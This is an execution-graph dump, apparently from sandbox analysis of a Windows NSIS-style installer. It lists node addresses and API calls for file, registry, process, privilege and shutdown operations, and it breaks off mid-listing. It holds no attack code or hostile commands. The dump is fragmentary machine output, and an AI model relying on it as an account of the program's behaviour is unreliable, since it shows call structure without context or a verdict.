                                  execution_graph 2881 4015c1 2901 402c41 2881->2901 2885 401631 2887 401663 2885->2887 2888 401636 2885->2888 2891 401423 24 API calls 2887->2891 2917 401423 2888->2917 2899 40165b 2891->2899 2895 40164a SetCurrentDirectoryW 2895->2899 2896 4015d1 2896->2885 2897 4015fa 2896->2897 2898 401617 GetFileAttributesW 2896->2898 2913 405bbc 2896->2913 2921 40588b 2896->2921 2929 40586e CreateDirectoryW 2896->2929 2897->2896 2924 4057f1 CreateDirectoryW 2897->2924 2898->2896 2902 402c4d 2901->2902 2932 4062dc 2902->2932 2905 4015c8 2907 405c3a CharNextW CharNextW 2905->2907 2908 405c57 2907->2908 2911 405c69 2907->2911 2910 405c64 CharNextW 2908->2910 2908->2911 2909 405c8d 2909->2896 2910->2909 2911->2909 2912 405bbc CharNextW 2911->2912 2912->2911 2914 405bc2 2913->2914 2915 405bd8 2914->2915 2916 405bc9 CharNextW 2914->2916 2915->2896 2916->2914 2970 405322 2917->2970 2920 4062ba lstrcpynW 2920->2895 2981 406694 GetModuleHandleA 2921->2981 2925 405842 GetLastError 2924->2925 2926 40583e 2924->2926 2925->2926 2927 405851 SetFileSecurityW 2925->2927 2926->2897 2927->2926 2928 405867 GetLastError 2927->2928 2928->2926 2930 405882 GetLastError 2929->2930 2931 40587e 2929->2931 2930->2931 2931->2896 2944 4062e9 2932->2944 2933 406534 2934 402c6e 2933->2934 2965 4062ba lstrcpynW 2933->2965 2934->2905 2949 40654e 2934->2949 2936 406502 lstrlenW 2936->2944 2939 4062dc 10 API calls 2939->2936 2941 406417 GetSystemDirectoryW 2941->2944 2942 40642a GetWindowsDirectoryW 2942->2944 2943 40654e 5 API calls 2943->2944 2944->2933 2944->2936 2944->2939 2944->2941 2944->2942 2944->2943 2945 40645e SHGetSpecialFolderLocation 2944->2945 2946 4062dc 10 API calls 2944->2946 2947 4064a5 lstrcatW 2944->2947 2958 406188 2944->2958 2963 406201 wsprintfW 2944->2963 2964 4062ba lstrcpynW 2944->2964 2945->2944 2948 406476 SHGetPathFromIDListW CoTaskMemFree 2945->2948 2946->2944 2947->2944 2948->2944 2952 40655b 2949->2952 2950 4065d1 2951 4065d6 CharPrevW 2950->2951 2955 4065f7 2950->2955 2951->2950 2952->2950 2953 4065c4 CharNextW 2952->2953 2954 405bbc CharNextW 2952->2954 2956 4065b0 CharNextW 2952->2956 2957 4065bf CharNextW 2952->2957 2953->2950 2953->2952 2954->2952 2955->2905 2956->2952 2957->2953 2966 406127 2958->2966 2961 4061ec 2961->2944 2962 4061bc RegQueryValueExW RegCloseKey 2962->2961 2963->2944 2964->2944 2965->2934 2967 406136 2966->2967 2968 40613a 2967->2968 2969 40613f RegOpenKeyExW 2967->2969 2968->2961 2968->2962 2969->2968 2971 40533d 2970->2971 2980 401431 2970->2980 2972 405359 lstrlenW 2971->2972 2973 4062dc 17 API calls 2971->2973 2974 405382 2972->2974 2975 405367 lstrlenW 2972->2975 2973->2972 2977 405395 2974->2977 2978 405388 SetWindowTextW 2974->2978 2976 405379 lstrcatW 2975->2976 2975->2980 2976->2974 2979 40539b SendMessageW SendMessageW SendMessageW 2977->2979 2977->2980 2978->2977 2979->2980 2980->2920 2982 4066b0 2981->2982 2983 4066ba GetProcAddress 2981->2983 2987 406624 GetSystemDirectoryW 2982->2987 2985 405892 2983->2985 2985->2896 2986 4066b6 2986->2983 2986->2985 2989 406646 wsprintfW LoadLibraryExW 2987->2989 2989->2986 3775 401e49 3776 402c1f 17 API calls 3775->3776 3777 401e4f 3776->3777 3778 402c1f 17 API calls 3777->3778 3779 401e5b 3778->3779 3780 401e72 EnableWindow 3779->3780 3781 401e67 ShowWindow 3779->3781 3782 402ac5 3780->3782 3781->3782 3783 40264a 3784 402c1f 17 API calls 3783->3784 3788 402659 3784->3788 3785 4026a3 ReadFile 3785->3788 3795 402796 3785->3795 3786 405e33 ReadFile 3786->3788 3788->3785 3788->3786 3789 4026e3 MultiByteToWideChar 3788->3789 3790 402798 3788->3790 3792 402709 SetFilePointer MultiByteToWideChar 3788->3792 3793 4027a9 3788->3793 3788->3795 3796 405e91 SetFilePointer 3788->3796 3789->3788 3805 406201 wsprintfW 3790->3805 3792->3788 3794 4027ca SetFilePointer 3793->3794 3793->3795 3794->3795 3797 405ead 3796->3797 3800 405ec5 3796->3800 3798 405e33 ReadFile 3797->3798 3799 405eb9 3798->3799 3799->3800 3801 405ef6 SetFilePointer 3799->3801 3802 405ece SetFilePointer 3799->3802 3800->3788 3801->3800 3802->3801 3803 405ed9 3802->3803 3804 405e62 WriteFile 3803->3804 3804->3800 3805->3795 3809 4016cc 3810 402c41 17 API calls 3809->3810 3811 4016d2 GetFullPathNameW 3810->3811 3812 4016ec 3811->3812 3818 40170e 3811->3818 3814 4065fd 2 API calls 3812->3814 3812->3818 3813 401723 GetShortPathNameW 3815 402ac5 3813->3815 3816 4016fe 3814->3816 3816->3818 3819 4062ba lstrcpynW 3816->3819 3818->3813 3818->3815 3819->3818 3820 40234e 3821 402c41 17 API calls 3820->3821 3822 40235d 3821->3822 3823 402c41 17 API calls 3822->3823 3824 402366 3823->3824 3825 402c41 17 API calls 3824->3825 3826 402370 GetPrivateProfileStringW 3825->3826 3827 401b53 3828 402c41 17 API calls 3827->3828 3829 401b5a 3828->3829 3830 402c1f 17 API calls 3829->3830 3831 401b63 wsprintfW 3830->3831 3832 402ac5 3831->3832 3833 401956 3834 402c41 17 API calls 3833->3834 3835 40195d lstrlenW 3834->3835 3836 402592 3835->3836 3254 4014d7 3259 402c1f 3254->3259 3256 4014dd Sleep 3258 402ac5 3256->3258 3260 4062dc 17 API calls 3259->3260 3261 402c34 3260->3261 3261->3256 3262 403d58 3263 403d70 3262->3263 3264 403eab 3262->3264 3263->3264 3265 403d7c 3263->3265 3266 403efc 3264->3266 3267 403ebc GetDlgItem GetDlgItem 3264->3267 3269 403d87 SetWindowPos 3265->3269 3270 403d9a 3265->3270 3268 403f56 3266->3268 3276 401389 2 API calls 3266->3276 3271 404231 18 API calls 3267->3271 3272 40427d SendMessageW 3268->3272 3293 403ea6 3268->3293 3269->3270 3273 403db7 3270->3273 3274 403d9f ShowWindow 3270->3274 3275 403ee6 SetClassLongW 3271->3275 3305 403f68 3272->3305 3277 403dd9 3273->3277 3278 403dbf DestroyWindow 3273->3278 3274->3273 3279 40140b 2 API calls 3275->3279 3280 403f2e 3276->3280 3281 403dde SetWindowLongW 3277->3281 3282 403def 3277->3282 3332 4041ba 3278->3332 3279->3266 3280->3268 3285 403f32 SendMessageW 3280->3285 3281->3293 3283 403e98 3282->3283 3284 403dfb GetDlgItem 3282->3284 3290 404298 8 API calls 3283->3290 3288 403e2b 3284->3288 3289 403e0e SendMessageW IsWindowEnabled 3284->3289 3285->3293 3286 40140b 2 API calls 3286->3305 3287 4041bc DestroyWindow EndDialog 3287->3332 3292 403e30 3288->3292 3295 403e38 3288->3295 3297 403e7f SendMessageW 3288->3297 3298 403e4b 3288->3298 3289->3288 3289->3293 3290->3293 3291 4041eb ShowWindow 3291->3293 3299 40420a SendMessageW 3292->3299 3294 4062dc 17 API calls 3294->3305 3295->3292 3295->3297 3296 404231 18 API calls 3296->3305 3297->3283 3301 403e53 3298->3301 3302 403e68 3298->3302 3300 403e66 3299->3300 3300->3283 3304 40140b 2 API calls 3301->3304 3303 40140b 2 API calls 3302->3303 3306 403e6f 3303->3306 3304->3292 3305->3286 3305->3287 3305->3293 3305->3294 3305->3296 3307 404231 18 API calls 3305->3307 3323 4040fc DestroyWindow 3305->3323 3306->3283 3306->3292 3308 403fe3 GetDlgItem 3307->3308 3309 404000 ShowWindow KiUserCallbackDispatcher 3308->3309 3310 403ff8 3308->3310 3333 404253 KiUserCallbackDispatcher 3309->3333 3310->3309 3312 40402a EnableWindow 3317 40403e 3312->3317 3313 404043 GetSystemMenu EnableMenuItem SendMessageW 3314 404073 SendMessageW 3313->3314 3313->3317 3314->3317 3317->3313 3334 404266 SendMessageW 3317->3334 3335 403d39 3317->3335 3338 4062ba lstrcpynW 3317->3338 3319 4040a2 lstrlenW 3320 4062dc 17 API calls 3319->3320 3321 4040b8 SetWindowTextW 3320->3321 3322 401389 2 API calls 3321->3322 3322->3305 3324 404116 CreateDialogParamW 3323->3324 3323->3332 3325 404149 3324->3325 3324->3332 3326 404231 18 API calls 3325->3326 3327 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3326->3327 3328 401389 2 API calls 3327->3328 3329 40419a 3328->3329 3329->3293 3330 4041a2 ShowWindow 3329->3330 3331 40427d SendMessageW 3330->3331 3331->3332 3332->3291 3332->3293 3333->3312 3334->3317 3336 4062dc 17 API calls 3335->3336 3337 403d47 SetWindowTextW 3336->3337 3337->3317 3338->3319 3837 401f58 3838 402c41 17 API calls 3837->3838 3839 401f5f 3838->3839 3840 4065fd 2 API calls 3839->3840 3841 401f65 3840->3841 3843 401f76 3841->3843 3844 406201 wsprintfW 3841->3844 3844->3843 3845 402259 3846 402c41 17 API calls 3845->3846 3847 40225f 3846->3847 3848 402c41 17 API calls 3847->3848 3849 402268 3848->3849 3850 402c41 17 API calls 3849->3850 3851 402271 3850->3851 3852 4065fd 2 API calls 3851->3852 3853 40227a 3852->3853 3854 40228b lstrlenW lstrlenW 3853->3854 3855 40227e 3853->3855 3857 405322 24 API calls 3854->3857 3856 405322 24 API calls 3855->3856 3859 402286 3855->3859 3856->3859 3858 4022c9 SHFileOperationW 3857->3858 3858->3855 3858->3859 3860 4046db 3861 404711 3860->3861 3862 4046eb 3860->3862 3864 404298 8 API calls 3861->3864 3863 404231 18 API calls 3862->3863 3865 4046f8 SetDlgItemTextW 3863->3865 3866 40471d 3864->3866 3865->3861 3867 40175c 3868 402c41 17 API calls 3867->3868 3869 401763 3868->3869 3870 405ddf 2 API calls 3869->3870 3871 40176a 3870->3871 3871->3871 3872 401d5d GetDlgItem GetClientRect 3873 402c41 17 API calls 3872->3873 3874 401d8f LoadImageW SendMessageW 3873->3874 3875 402ac5 3874->3875 3876 401dad DeleteObject 3874->3876 3876->3875 3877 4022dd 3878 4022e4 3877->3878 3880 4022f7 3877->3880 3879 4062dc 17 API calls 3878->3879 3881 4022f1 3879->3881 3882 405920 MessageBoxIndirectW 3881->3882 3882->3880 2990 405461 2991 405482 GetDlgItem GetDlgItem GetDlgItem 2990->2991 2992 40560b 2990->2992 3035 404266 SendMessageW 2991->3035 2994 405614 GetDlgItem CreateThread CloseHandle 2992->2994 2995 40563c 2992->2995 2994->2995 3058 4053f5 OleInitialize 2994->3058 2997 405667 2995->2997 2998 405653 ShowWindow ShowWindow 2995->2998 2999 40568c 2995->2999 2996 4054f2 3002 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 2996->3002 3000 4056c7 2997->3000 3004 4056a1 ShowWindow 2997->3004 3005 40567b 2997->3005 3040 404266 SendMessageW 2998->3040 3044 404298 2999->3044 3000->2999 3010 4056d5 SendMessageW 3000->3010 3008 405567 3002->3008 3009 40554b SendMessageW SendMessageW 3002->3009 3006 4056c1 3004->3006 3007 4056b3 3004->3007 3041 40420a 3005->3041 3013 40420a SendMessageW 3006->3013 3012 405322 24 API calls 3007->3012 3014 40557a 3008->3014 3015 40556c SendMessageW 3008->3015 3009->3008 3016 40569a 3010->3016 3017 4056ee CreatePopupMenu 3010->3017 3012->3006 3013->3000 3036 404231 3014->3036 3015->3014 3018 4062dc 17 API calls 3017->3018 3020 4056fe AppendMenuW 3018->3020 3022 40571b GetWindowRect 3020->3022 3023 40572e TrackPopupMenu 3020->3023 3021 40558a 3024 405593 ShowWindow 3021->3024 3025 4055c7 GetDlgItem SendMessageW 3021->3025 3022->3023 3023->3016 3027 405749 3023->3027 3028 4055b6 3024->3028 3029 4055a9 ShowWindow 3024->3029 3025->3016 3026 4055ee SendMessageW SendMessageW 3025->3026 3026->3016 3030 405765 SendMessageW 3027->3030 3039 404266 SendMessageW 3028->3039 3029->3028 3030->3030 3031 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3030->3031 3033 4057a7 SendMessageW 3031->3033 3033->3033 3034 4057d0 GlobalUnlock SetClipboardData CloseClipboard 3033->3034 3034->3016 3035->2996 3037 4062dc 17 API calls 3036->3037 3038 40423c SetDlgItemTextW 3037->3038 3038->3021 3039->3025 3040->2997 3042 404211 3041->3042 3043 404217 SendMessageW 3041->3043 3042->3043 3043->2999 3045 40435b 3044->3045 3046 4042b0 GetWindowLongW 3044->3046 3045->3016 3046->3045 3047 4042c5 3046->3047 3047->3045 3048 4042f2 GetSysColor 3047->3048 3049 4042f5 3047->3049 3048->3049 3050 404305 SetBkMode 3049->3050 3051 4042fb SetTextColor 3049->3051 3052 404323 3050->3052 3053 40431d GetSysColor 3050->3053 3051->3050 3054 40432a SetBkColor 3052->3054 3055 404334 3052->3055 3053->3052 3054->3055 3055->3045 3056 404347 DeleteObject 3055->3056 3057 40434e CreateBrushIndirect 3055->3057 3056->3057 3057->3045 3065 40427d 3058->3065 3060 40543f 3061 40427d SendMessageW 3060->3061 3062 405451 CoUninitialize 3061->3062 3063 405418 3063->3060 3068 401389 3063->3068 3066 404295 3065->3066 3067 404286 SendMessageW 3065->3067 3066->3063 3067->3066 3070 401390 3068->3070 3069 4013fe 3069->3063 3070->3069 3071 4013cb MulDiv SendMessageW 3070->3071 3071->3070 3883 401563 3884 402a6b 3883->3884 3887 406201 wsprintfW 3884->3887 3886 402a70 3887->3886 3888 4023e4 3889 402c41 17 API calls 3888->3889 3890 4023f6 3889->3890 3891 402c41 17 API calls 3890->3891 3892 402400 3891->3892 3905 402cd1 3892->3905 3895 402ac5 3896 402438 3898 402444 3896->3898 3901 402c1f 17 API calls 3896->3901 3897 402c41 17 API calls 3900 40242e lstrlenW 3897->3900 3899 402463 RegSetValueExW 3898->3899 3902 403116 31 API calls 3898->3902 3903 402479 RegCloseKey 3899->3903 3900->3896 3901->3898 3902->3899 3903->3895 3906 402cec 3905->3906 3909 406155 3906->3909 3910 406164 3909->3910 3911 402410 3910->3911 3912 40616f RegCreateKeyExW 3910->3912 3911->3895 3911->3896 3911->3897 3912->3911 3913 404367 lstrcpynW lstrlenW 3914 401968 3915 402c1f 17 API calls 3914->3915 3916 40196f 3915->3916 3917 402c1f 17 API calls 3916->3917 3918 40197c 3917->3918 3919 402c41 17 API calls 3918->3919 3920 401993 lstrlenW 3919->3920 3921 4019a4 3920->3921 3922 4019e5 3921->3922 3926 4062ba lstrcpynW 3921->3926 3924 4019d5 3924->3922 3925 4019da lstrlenW 3924->3925 3925->3922 3926->3924 3927 402868 3928 402c41 17 API calls 3927->3928 3929 40286f FindFirstFileW 3928->3929 3930 402882 3929->3930 3931 402897 3929->3931 3935 406201 wsprintfW 3931->3935 3933 4028a0 3936 4062ba lstrcpynW 3933->3936 3935->3933 3936->3930 3937 403968 3938 403973 3937->3938 3939 403977 3938->3939 3940 40397a GlobalAlloc 3938->3940 3940->3939 3941 40166a 3942 402c41 17 API calls 3941->3942 3943 401670 3942->3943 3944 4065fd 2 API calls 3943->3944 3945 401676 3944->3945 3376 40176f 3377 402c41 17 API calls 3376->3377 3378 401776 3377->3378 3379 401796 3378->3379 3380 40179e 3378->3380 3438 4062ba lstrcpynW 3379->3438 3439 4062ba lstrcpynW 3380->3439 3383 40179c 3387 40654e 5 API calls 3383->3387 3384 4017a9 3385 405b8f 3 API calls 3384->3385 3386 4017af lstrcatW 3385->3386 3386->3383 3405 4017bb 3387->3405 3388 4065fd 2 API calls 3388->3405 3391 4017cd CompareFileTime 3391->3405 3392 40188d 3394 405322 24 API calls 3392->3394 3393 401864 3395 405322 24 API calls 3393->3395 3404 401879 3393->3404 3397 401897 3394->3397 3395->3404 3396 4062ba lstrcpynW 3396->3405 3418 403116 3397->3418 3400 4018be SetFileTime 3402 4018d0 CloseHandle 3400->3402 3401 4062dc 17 API calls 3401->3405 3403 4018e1 3402->3403 3402->3404 3406 4018e6 3403->3406 3407 4018f9 3403->3407 3405->3388 3405->3391 3405->3392 3405->3393 3405->3396 3405->3401 3414 405d8b GetFileAttributesW 3405->3414 3417 405db0 GetFileAttributesW CreateFileW 3405->3417 3440 405920 3405->3440 3408 4062dc 17 API calls 3406->3408 3409 4062dc 17 API calls 3407->3409 3410 4018ee lstrcatW 3408->3410 3411 401901 3409->3411 3410->3411 3413 405920 MessageBoxIndirectW 3411->3413 3413->3404 3415 405daa 3414->3415 3416 405d9d SetFileAttributesW 3414->3416 3415->3405 3416->3415 3417->3405 3419 40312f 3418->3419 3420 40315d 3419->3420 3449 403347 SetFilePointer 3419->3449 3444 403331 3420->3444 3424 4032ca 3426 40330c 3424->3426 3431 4032ce 3424->3431 3425 40317a GetTickCount 3427 4018aa 3425->3427 3434 4031c9 3425->3434 3429 403331 ReadFile 3426->3429 3427->3400 3427->3402 3428 403331 ReadFile 3428->3434 3429->3427 3430 403331 ReadFile 3430->3431 3431->3427 3431->3430 3432 405e62 WriteFile 3431->3432 3432->3431 3433 40321f GetTickCount 3433->3434 3434->3427 3434->3428 3434->3433 3435 403244 MulDiv wsprintfW 3434->3435 3447 405e62 WriteFile 3434->3447 3436 405322 24 API calls 3435->3436 3436->3434 3438->3383 3439->3384 3441 405935 3440->3441 3442 405981 3441->3442 3443 405949 MessageBoxIndirectW 3441->3443 3442->3405 3443->3442 3450 405e33 ReadFile 3444->3450 3448 405e80 3447->3448 3448->3434 3449->3420 3451 403168 3450->3451 3451->3424 3451->3425 3451->3427 3946 4027ef 3947 402a70 3946->3947 3948 4027f6 3946->3948 3949 402c1f 17 API calls 3948->3949 3950 4027fd 3949->3950 3951 40280c SetFilePointer 3950->3951 3951->3947 3952 40281c 3951->3952 3954 406201 wsprintfW 3952->3954 3954->3947 3955 4043f0 3956 404408 3955->3956 3963 404522 3955->3963 3960 404231 18 API calls 3956->3960 3957 40458c 3958 404656 3957->3958 3959 404596 GetDlgItem 3957->3959 3965 404298 8 API calls 3958->3965 3961 4045b0 3959->3961 3962 404617 3959->3962 3964 40446f 3960->3964 3961->3962 3968 4045d6 SendMessageW LoadCursorW SetCursor 3961->3968 3962->3958 3969 404629 3962->3969 3963->3957 3963->3958 3966 40455d GetDlgItem SendMessageW 3963->3966 3967 404231 18 API calls 3964->3967 3979 404651 3965->3979 3988 404253 KiUserCallbackDispatcher 3966->3988 3972 40447c CheckDlgButton 3967->3972 3989 40469f 3968->3989 3974 40463f 3969->3974 3975 40462f SendMessageW 3969->3975 3971 404587 3976 40467b SendMessageW 3971->3976 3986 404253 KiUserCallbackDispatcher 3972->3986 3974->3979 3980 404645 SendMessageW 3974->3980 3975->3974 3976->3957 3980->3979 3981 40449a GetDlgItem 3987 404266 SendMessageW 3981->3987 3983 4044b0 SendMessageW 3984 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3983->3984 3985 4044cd GetSysColor 3983->3985 3984->3979 3985->3984 3986->3981 3987->3983 3988->3971 3992 4058e6 ShellExecuteExW 3989->3992 3991 404605 LoadCursorW SetCursor 3991->3962 3992->3991 3993 401a72 3994 402c1f 17 API calls 3993->3994 3995 401a7b 3994->3995 3996 402c1f 17 API calls 3995->3996 3997 401a20 3996->3997 3998 401573 3999 401583 ShowWindow 3998->3999 4000 40158c 3998->4000 3999->4000 4001 402ac5 4000->4001 4002 40159a ShowWindow 4000->4002 4002->4001 4003 402df3 4004 402e05 SetTimer 4003->4004 4005 402e1e 4003->4005 4004->4005 4006 402e73 4005->4006 4007 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4005->4007 4007->4006 4008 401cf3 4009 402c1f 17 API calls 4008->4009 4010 401cf9 IsWindow 4009->4010 4011 401a20 4010->4011 4012 4014f5 SetForegroundWindow 4013 402ac5 4012->4013 4014 402576 4015 402c41 17 API calls 4014->4015 4016 40257d 4015->4016 4019 405db0 GetFileAttributesW CreateFileW 4016->4019 4018 402589 4019->4018 4020 401b77 4021 401bc8 4020->4021 4023 401b84 4020->4023 4024 401bf2 GlobalAlloc 4021->4024 4025 401bcd 4021->4025 4022 4022e4 4027 4062dc 17 API calls 4022->4027 4023->4022 4029 401b9b 4023->4029 4026 4062dc 17 API calls 4024->4026 4035 401c0d 4025->4035 4041 4062ba lstrcpynW 4025->4041 4026->4035 4028 4022f1 4027->4028 4033 405920 MessageBoxIndirectW 4028->4033 4039 4062ba lstrcpynW 4029->4039 4032 401bdf GlobalFree 4032->4035 4033->4035 4034 401baa 4040 4062ba lstrcpynW 4034->4040 4037 401bb9 4042 4062ba lstrcpynW 4037->4042 4039->4034 4040->4037 4041->4032 4042->4035 4043 404a78 4044 404aa4 4043->4044 4045 404a88 4043->4045 4047 404ad7 4044->4047 4048 404aaa SHGetPathFromIDListW 4044->4048 4054 405904 GetDlgItemTextW 4045->4054 4050 404ac1 SendMessageW 4048->4050 4051 404aba 4048->4051 4049 404a95 SendMessageW 4049->4044 4050->4047 4053 40140b 2 API calls 4051->4053 4053->4050 4054->4049 4055 4024f8 4056 402c81 17 API calls 4055->4056 4057 402502 4056->4057 4058 402c1f 17 API calls 4057->4058 4059 40250b 4058->4059 4060 402533 RegEnumValueW 4059->4060 4061 402527 RegEnumKeyW 4059->4061 4062 40288b 4059->4062 4063 402548 RegCloseKey 4060->4063 4061->4063 4063->4062 4065 40167b 4066 402c41 17 API calls 4065->4066 4067 401682 4066->4067 4068 402c41 17 API calls 4067->4068 4069 40168b 4068->4069 4070 402c41 17 API calls 4069->4070 4071 401694 MoveFileW 4070->4071 4072 4016a7 4071->4072 4078 4016a0 4071->4078 4074 4065fd 2 API calls 4072->4074 4076 402250 4072->4076 4073 401423 24 API calls 4073->4076 4075 4016b6 4074->4075 4075->4076 4077 406080 36 API calls 4075->4077 4077->4078 4078->4073 4079 401e7d 4080 402c41 17 API calls 4079->4080 4081 401e83 4080->4081 4082 402c41 17 API calls 4081->4082 4083 401e8c 4082->4083 4084 402c41 17 API calls 4083->4084 4085 401e95 4084->4085 4086 402c41 17 API calls 4085->4086 4087 401e9e 4086->4087 4088 401423 24 API calls 4087->4088 4089 401ea5 4088->4089 4096 4058e6 ShellExecuteExW 4089->4096 4091 401ee7 4092 406745 5 API calls 4091->4092 4094 40288b 4091->4094 4093 401f01 CloseHandle 4092->4093 4093->4094 4096->4091 4097 4019ff 4098 402c41 17 API calls 4097->4098 4099 401a06 4098->4099 4100 402c41 17 API calls 4099->4100 4101 401a0f 4100->4101 4102 401a16 lstrcmpiW 4101->4102 4103 401a28 lstrcmpW 4101->4103 4104 401a1c 4102->4104 4103->4104 4105 401000 4106 401037 BeginPaint GetClientRect 4105->4106 4107 40100c DefWindowProcW 4105->4107 4109 4010f3 4106->4109 4110 401179 4107->4110 4111 401073 CreateBrushIndirect FillRect DeleteObject 4109->4111 4112 4010fc 4109->4112 4111->4109 4113 401102 CreateFontIndirectW 4112->4113 4114 401167 EndPaint 4112->4114 4113->4114 4115 401112 6 API calls 4113->4115 4114->4110 4115->4114 4116 401503 4117 40150b 4116->4117 4119 40151e 4116->4119 4118 402c1f 17 API calls 4117->4118 4118->4119 3209 402484 3220 402c81 3209->3220 3212 402c41 17 API calls 3213 402497 3212->3213 3214 4024a2 RegQueryValueExW 3213->3214 3219 40288b 3213->3219 3215 4024c8 RegCloseKey 3214->3215 3216 4024c2 3214->3216 3215->3219 3216->3215 3225 406201 wsprintfW 3216->3225 3221 402c41 17 API calls 3220->3221 3222 402c98 3221->3222 3223 406127 RegOpenKeyExW 3222->3223 3224 40248e 3223->3224 3224->3212 3225->3215 4120 402104 4121 402c41 17 API calls 4120->4121 4122 40210b 4121->4122 4123 402c41 17 API calls 4122->4123 4124 402115 4123->4124 4125 402c41 17 API calls 4124->4125 4126 40211f 4125->4126 4127 402c41 17 API calls 4126->4127 4128 402129 4127->4128 4129 402c41 17 API calls 4128->4129 4131 402133 4129->4131 4130 402172 CoCreateInstance 4135 402191 4130->4135 4131->4130 4132 402c41 17 API calls 4131->4132 4132->4130 4133 401423 24 API calls 4134 402250 4133->4134 4135->4133 4135->4134 3226 401f06 3227 402c41 17 API calls 3226->3227 3228 401f0c 3227->3228 3229 405322 24 API calls 3228->3229 3230 401f16 3229->3230 3241 4058a3 CreateProcessW 3230->3241 3233 401f3f CloseHandle 3237 40288b 3233->3237 3236 401f31 3238 401f41 3236->3238 3239 401f36 3236->3239 3238->3233 3249 406201 wsprintfW 3239->3249 3242 401f1c 3241->3242 3243 4058d6 CloseHandle 3241->3243 3242->3233 3242->3237 3244 406745 WaitForSingleObject 3242->3244 3243->3242 3245 40675f 3244->3245 3246 406771 GetExitCodeProcess 3245->3246 3250 4066d0 3245->3250 3246->3236 3249->3233 3251 4066ed PeekMessageW 3250->3251 3252 4066e3 DispatchMessageW 3251->3252 3253 4066fd WaitForSingleObject 3251->3253 3252->3251 3253->3245 3339 40230c 3340 402314 3339->3340 3341 40231a 3339->3341 3342 402c41 17 API calls 3340->3342 3343 402328 3341->3343 3344 402c41 17 API calls 3341->3344 3342->3341 3345 402336 3343->3345 3347 402c41 17 API calls 3343->3347 3344->3343 3346 402c41 17 API calls 3345->3346 3348 40233f WritePrivateProfileStringW 3346->3348 3347->3345 4136 40190c 4137 401943 4136->4137 4138 402c41 17 API calls 4137->4138 4139 401948 4138->4139 4140 4059cc 67 API calls 4139->4140 4141 401951 4140->4141 4142 401f8c 4143 402c41 17 API calls 4142->4143 4144 401f93 4143->4144 4145 406694 5 API calls 4144->4145 4146 401fa2 4145->4146 4147 402026 4146->4147 4148 401fbe GlobalAlloc 4146->4148 4148->4147 4149 401fd2 4148->4149 4150 406694 5 API calls 4149->4150 4151 401fd9 4150->4151 4152 406694 5 API calls 4151->4152 4153 401fe3 4152->4153 4153->4147 4157 406201 wsprintfW 4153->4157 4155 402018 4158 406201 wsprintfW 4155->4158 4157->4155 4158->4147 3349 40238e 3350 4023c1 3349->3350 3351 402396 3349->3351 3353 402c41 17 API calls 3350->3353 3352 402c81 17 API calls 3351->3352 3354 40239d 3352->3354 3355 4023c8 3353->3355 3356 4023a7 3354->3356 3359 4023d5 3354->3359 3361 402cff 3355->3361 3358 402c41 17 API calls 3356->3358 3360 4023ae RegDeleteValueW RegCloseKey 3358->3360 3360->3359 3362 402d0c 3361->3362 3363 402d13 3361->3363 3362->3359 3363->3362 3365 402d44 3363->3365 3366 406127 RegOpenKeyExW 3365->3366 3367 402d72 3366->3367 3368 402d98 RegEnumKeyW 3367->3368 3369 402daf RegCloseKey 3367->3369 3370 402dd0 RegCloseKey 3367->3370 3372 402d44 6 API calls 3367->3372 3375 402dc3 3367->3375 3368->3367 3368->3369 3371 406694 5 API calls 3369->3371 3370->3375 3373 402dbf 3371->3373 3372->3367 3374 402de0 RegDeleteKeyW 3373->3374 3373->3375 3374->3375 3375->3362 3452 40338f SetErrorMode GetVersion 3453 4033ce 3452->3453 3454 4033d4 3452->3454 3455 406694 5 API calls 3453->3455 3456 406624 3 API calls 3454->3456 3455->3454 3457 4033ea lstrlenA 3456->3457 3457->3454 3458 4033fa 3457->3458 3459 406694 5 API calls 3458->3459 3460 403401 3459->3460 3461 406694 5 API calls 3460->3461 3462 403408 3461->3462 3463 406694 5 API calls 3462->3463 3464 403414 #17 OleInitialize SHGetFileInfoW 3463->3464 3542 4062ba lstrcpynW 3464->3542 3467 403460 GetCommandLineW 3543 4062ba lstrcpynW 3467->3543 3469 403472 3470 405bbc CharNextW 3469->3470 3471 403497 CharNextW 3470->3471 3472 4035c1 GetTempPathW 3471->3472 3482 4034b0 3471->3482 3544 40335e 3472->3544 3474 4035d9 3475 403633 DeleteFileW 3474->3475 3476 4035dd GetWindowsDirectoryW lstrcatW 3474->3476 3554 402edd GetTickCount GetModuleFileNameW 3475->3554 3479 40335e 12 API calls 3476->3479 3477 405bbc CharNextW 3477->3482 3481 4035f9 3479->3481 3480 403647 3490 405bbc CharNextW 3480->3490 3524 4036ea 3480->3524 3537 4036fa 3480->3537 3481->3475 3483 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3481->3483 3482->3477 3484 4035ac 3482->3484 3486 4035aa 3482->3486 3485 40335e 12 API calls 3483->3485 3638 4062ba lstrcpynW 3484->3638 3488 40362b 3485->3488 3486->3472 3488->3475 3488->3537 3496 403666 3490->3496 3493 403834 3495 40383c GetCurrentProcess OpenProcessToken 3493->3495 3500 4038b8 ExitProcess 3493->3500 3494 403714 3497 405920 MessageBoxIndirectW 3494->3497 3498 403854 LookupPrivilegeValueW AdjustTokenPrivileges 3495->3498 3499 403888 3495->3499 3502 4036c4 3496->3502 3503 40372a 3496->3503 3504 403722 ExitProcess 3497->3504 3498->3499 3507 406694 5 API calls 3499->3507 3505 405c97 18 API calls 3502->3505 3506 40588b 5 API calls 3503->3506 3508 4036d0 3505->3508 3509 40372f lstrcatW 3506->3509 3510 40388f 3507->3510 3508->3537 3639 4062ba lstrcpynW 3508->3639 3511 403740 lstrcatW 3509->3511 3512 40374b lstrcatW lstrcmpiW 3509->3512 3513 4038a4 ExitWindowsEx 3510->3513 3516 4038b1 3510->3516 3511->3512 3515 403767 3512->3515 3512->3537 3513->3500 3513->3516 3518 403773 3515->3518 3519 40376c 3515->3519 3520 40140b 2 API calls 3516->3520 3517 4036df 3640 4062ba lstrcpynW 3517->3640 3523 40586e 2 API calls 3518->3523 3522 4057f1 4 API calls 3519->3522 3520->3500 3525 403771 3522->3525 3526 403778 SetCurrentDirectoryW 3523->3526 3582 4039aa 3524->3582 3525->3526 3527 403793 3526->3527 3528 403788 3526->3528 3649 4062ba lstrcpynW 3527->3649 3648 4062ba lstrcpynW 3528->3648 3531 4062dc 17 API calls 3532 4037d2 DeleteFileW 3531->3532 3533 4037df CopyFileW 3532->3533 3539 4037a1 